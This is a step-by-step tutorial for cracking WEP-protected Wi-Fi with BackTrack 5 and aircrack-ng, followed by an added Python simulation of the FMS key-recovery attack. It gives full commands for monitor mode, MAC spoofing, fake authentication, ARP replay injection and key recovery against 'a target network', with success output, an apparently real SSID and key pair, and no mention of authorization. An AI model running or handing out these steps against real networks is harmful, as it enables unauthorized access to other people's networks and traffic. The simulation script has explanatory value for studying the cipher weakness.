WEP Cracking

Using BackTrack 5

Download the BackTrack 5 KDE 64-bit ISO:
  http://www.backtrack-linux.org/backtrack/backtrack-5-release/

Create a bootable USB drive with UNetbootin:
  http://unetbootin.sourceforge.net/

Reboot the computer with the USB drive inserted. Make sure the BIOS is set to boot from USB devices before the HDD/optical drive, then boot into the BackTrack live system (it is Ubuntu-based).

Delete the kcache files, otherwise startx may fail to load:
  cd /root/.kde/
  find . -type f -iname "*.kcache" -delete
  startx

Open a new Konsole window. Obtain the name of the wireless interface (%INTERFACE% in the commands below):
  airmon-ng

Put the interface into monitor mode and spoof its MAC address:
  airmon-ng stop %INTERFACE%
  ifconfig %INTERFACE% down
  macchanger --mac 00:11:22:33:44:55 %INTERFACE%
  airmon-ng start %INTERFACE%

Note that with the mac80211 drivers in BackTrack 5, "airmon-ng start wlan0" creates a separate monitor interface (typically mon0) rather than switching wlan0 itself. Read the airmon-ng output and use that monitor interface as %INTERFACE% in the airodump-ng and aireplay-ng commands below. The MAC passed with -h must be the one the injecting interface actually carries; check it with "macchanger -s".

Pick a target network. Take note of the access point's human-readable name (%ESSID%), MAC address (%BSSID%) and channel (%CHANNEL%):
  airodump-ng %INTERFACE%

Start monitoring the target network. Captured packets are written to capturedata-01.cap (the number increments on each run):
  airodump-ng -c %CHANNEL% -w capturedata --bssid %BSSID% %INTERFACE%

Open a new Konsole window. Associate the interface with the access point (fake authentication):
  aireplay-ng -1 0 -a %BSSID% -h 00:11:22:33:44:55 -e %ESSID% %INTERFACE%

A successful association looks like:
  18:18:20 Sending Authentication Request
  18:18:20 Authentication successful
  18:18:20 Sending Association Request
  18:18:20 Association successful :-)

If the access point drops idle clients, keep the association alive instead: re-authenticate every 6000 seconds, sending one set of packets per authentication and a keep-alive every 10 seconds:
  aireplay-ng -1 6000 -o 1 -q 10 -e %ESSID% -a %BSSID% -h 00:11:22:33:44:55 %INTERFACE%

Open a new Konsole window. Generate traffic with the ARP request replay attack. aireplay-ng waits for an ARP request from the network, then replays it so that the access point emits fresh packets, each carrying a new IV, at upwards of 500 packets per second:
  aireplay-ng -3 -b %BSSID% -h 00:11:22:33:44:55 %INTERFACE%

Continue capturing packets for a while. With the FMS/KoreK statistical attack an estimated 250,000 IVs are required for a 64-bit key (40-bit secret) and 1,500,000 IVs for a 128-bit key (104-bit secret); there is no 32-bit WEP key, the advertised sizes include the 24-bit IV. The PTW attack that current aircrack-ng versions use by default needs far fewer IVs, typically tens of thousands. Success was had after about 1.3M packets were received on a testing target.

After enough packets have been captured, open a new Konsole window and recover the WEP key from the capture files:
  aircrack-ng -b %BSSID% capturedata*.cap

Alternatively, force the older FMS/KoreK method:
  aircrack-ng -K -b %BSSID% capturedata*.cap

If not successful, spend more time capturing packets. A successful attack looks like:
  Aircrack-ng 0.9

  [00:03:06] Tested 674449 keys (got 96610 IVs)

  KB    depth   byte(vote)
   0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)
   1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
   2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
   3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)

  KEY FOUND! [ 12:34:56:78:90 ]
  Probability: 100%

??? PROFIT!
SSID: firefly WEP KEY: AF1B08A3E0
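The byte(vote) table in the aircrack-ng output is the visible face of the statistical attack: KB is the key byte index, each captured IV that "resolves" for that byte casts one vote for a candidate value, the true byte collects votes roughly 5% of the time while wrong candidates are spread thinly, and depth (the fudge factor) is how far down the ranked candidates aircrack-ng is prepared to go before verifying a full key. The Python script below is an added example, not code from the original page or from the aircrack-ng project; it reproduces the mechanism on a simulated capture. It builds WEP frames for the classic FMS weak IVs (A+3, 255, x), recovers the 40-bit key byte by byte with the resolved-IV vote, and searches the top-ranked candidates depth first with a small fudge factor, checking each complete key against the capture the way aircrack-ng checks decrypted frames. The known-plaintext check relies on every WEP data frame starting with the LLC/SNAP byte 0xAA, so the first keystream byte is known for every frame. The secret key AF1B08A3E0 is the one reported above; the IV set, the fudge factor of 8, the eight-frame verification sample and all function names are choices of this example.

```python
"""FMS-style statistical recovery of a 40-bit WEP key from first keystream bytes.

Added example: simulates the capture, then attacks it. Not aircrack-ng code.
"""
import random
from collections import Counter

SNAP_BYTE = 0xAA          # every WEP data frame's plaintext begins with the LLC/SNAP DSAP byte
KEY_LEN = 5               # 40-bit secret ("64-bit WEP" once the 24-bit IV is counted)
SECRET = bytes.fromhex("AF1B08A3E0")   # the key reported for SSID firefly above


def rc4_first_byte(key):
    """KSA over `key` (IV || secret for WEP), then the first PRGA output byte."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    j = s[1]                      # PRGA step i=1: j = 0 + s[1]
    s[1], s[j] = s[j], s[1]
    return s[(s[1] + s[j]) & 0xFF]


def wep_frame(iv, secret):
    """What an eavesdropper sees: the cleartext IV and the first ciphertext byte."""
    return (tuple(iv), SNAP_BYTE ^ rc4_first_byte(list(iv) + list(secret)))


def build_capture(secret):
    """Constructed capture: the classic FMS weak IVs (a+3, 255, x) for every key byte a."""
    frames = [wep_frame((a + 3, 255, x), secret)
              for a in range(len(secret)) for x in range(256)]
    random.Random(7).shuffle(frames)   # order is irrelevant to the attack
    return frames


def fms_votes(frames, known):
    """Vote for secret byte index len(known), given the already recovered prefix."""
    a = len(known)
    votes = Counter()
    for iv, c0 in frames:
        if iv[0] != a + 3:
            continue   # shortcut only; the resolved test below is what qualifies an IV
        key = list(iv) + list(known)   # the first a+3 key bytes are known to the attacker
        s = list(range(256))
        j = 0
        for i in range(a + 3):         # run the KSA as far as the known bytes allow
            j = (j + s[i] + key[i]) & 0xFF
            s[i], s[j] = s[j], s[i]
        # "Resolved" condition: if s[0], s[1] and s[a+3] survive the rest of the KSA,
        # the first PRGA byte is s[a+3] after step a+3, i.e. s[j_next] of this state.
        if not (s[1] < a + 3 and (s[1] + s[s[1]]) & 0xFF == a + 3):
            continue
        out = c0 ^ SNAP_BYTE                    # known plaintext gives the keystream byte
        j_next = s.index(out)                   # where that byte sits in the current state
        votes[(j_next - j - s[a + 3]) & 0xFF] += 1   # K[a+3] = j_next - j - s[a+3]
    return votes


def key_fits(frames, key, sample=8):
    """aircrack-style confirmation: the candidate must reproduce captured keystream."""
    return all(wep_frame(iv, key)[1] == c0 for iv, c0 in frames[:sample])


def crack(frames, fudge=8, known=()):
    """Depth-first search over the top `fudge` vote winners for each key byte."""
    if len(known) == KEY_LEN:
        return list(known) if key_fits(frames, known) else None
    for byte, _ in fms_votes(frames, known).most_common(fudge):
        found = crack(frames, fudge, known + (byte,))
        if found is not None:
            return found
    return None


def demo(secret=SECRET):
    """Build the simulated capture and attack it; returns the recovered key or None."""
    return crack(build_capture(secret))


if __name__ == "__main__":
    frames = build_capture(SECRET)
    key = crack(frames)
    if key is None:
        print("KEY NOT FOUND: capture more IVs")
    else:
        print("KB    byte(vote)")
        for kb in range(KEY_LEN):
            top = fms_votes(frames, tuple(key[:kb])).most_common(5)
            print(f"{kb:2d}    " + " ".join(f"{b:02X}({v:3d})" for b, v in top))
        print("KEY FOUND! [ " + ":".join(f"{b:02X}" for b in key) + " ]")
```

With only 256 weak IVs per key byte the correct value wins by a dozen or so votes against a background of about one vote per wrong candidate, which is exactly why a real capture needs hundreds of thousands of IVs: only a small fraction of the IVs an access point emits fall into a weak class, and the ARP replay step exists purely to make the access point burn through IVs faster.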
